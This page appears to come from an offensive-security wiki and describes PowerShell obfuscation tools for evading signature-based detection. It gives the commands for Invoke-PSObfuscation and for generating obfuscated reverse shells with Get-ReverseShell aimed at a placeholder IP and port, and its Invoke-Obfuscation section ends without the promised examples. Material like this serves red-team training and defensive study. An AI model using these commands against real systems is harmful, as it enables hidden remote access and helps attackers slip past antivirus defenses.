search
Infiltr8ForumGitHub
githubEdit

PowerShell Obfuscation

hashtag
Theory

Following techniques aiming to evade detection based on signatures by obfuscating PowerShell scripts and commands.

hashtag
Practice

hashtag
Invoke-PsObfuscation

invoke-psobfuscationarrow-up-right is a powerfull powershell obfuscating tool.

circle-check

We may use invoke-psobfuscation using pwshon a unix-like host

We can import the tool as follows.

Import-Module ./Invoke-PSObfuscation.ps1

To obfuscate a powershell file, use the following cmdlets.

# Using all switches
Invoke-PSObfuscation -Path in.ps1 -PipelineVariables -Pipes -Cmdlets -Methods -Integers -Aliases -Comments -NamespaceClasses -Variables -Strings -OutFile out.ps1

hashtag
Get-ReverseShell

Get-ReverseShellarrow-up-right is a tool with the sole purpose of producing obfuscated reverse shells for PowerShell.

circle-check

We may use Get-ReverseShell using pwshon a unix-like host

We can import the tool as follows.

Import-Module ./get-reverseshell.ps1

To generate a revers shell, use the following cmdlets

# To stdout
Get-ReverseShell -Ip $IP -Port $PORT

# To file
Get-ReverseShell -Ip $IP -Port $PORT -OutFile /path/to/rev.ps1

hashtag
Invoke-Obfuscation

Invoke-Obfuscationarrow-up-right is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. Even though it is quite old, it is still relevant for bypassing static detections.

circle-check

We may use Invoke-Obfuscation using pwshon a unix-like host

We can import and start the tool as follows.

Here are some usage examples:

Last updated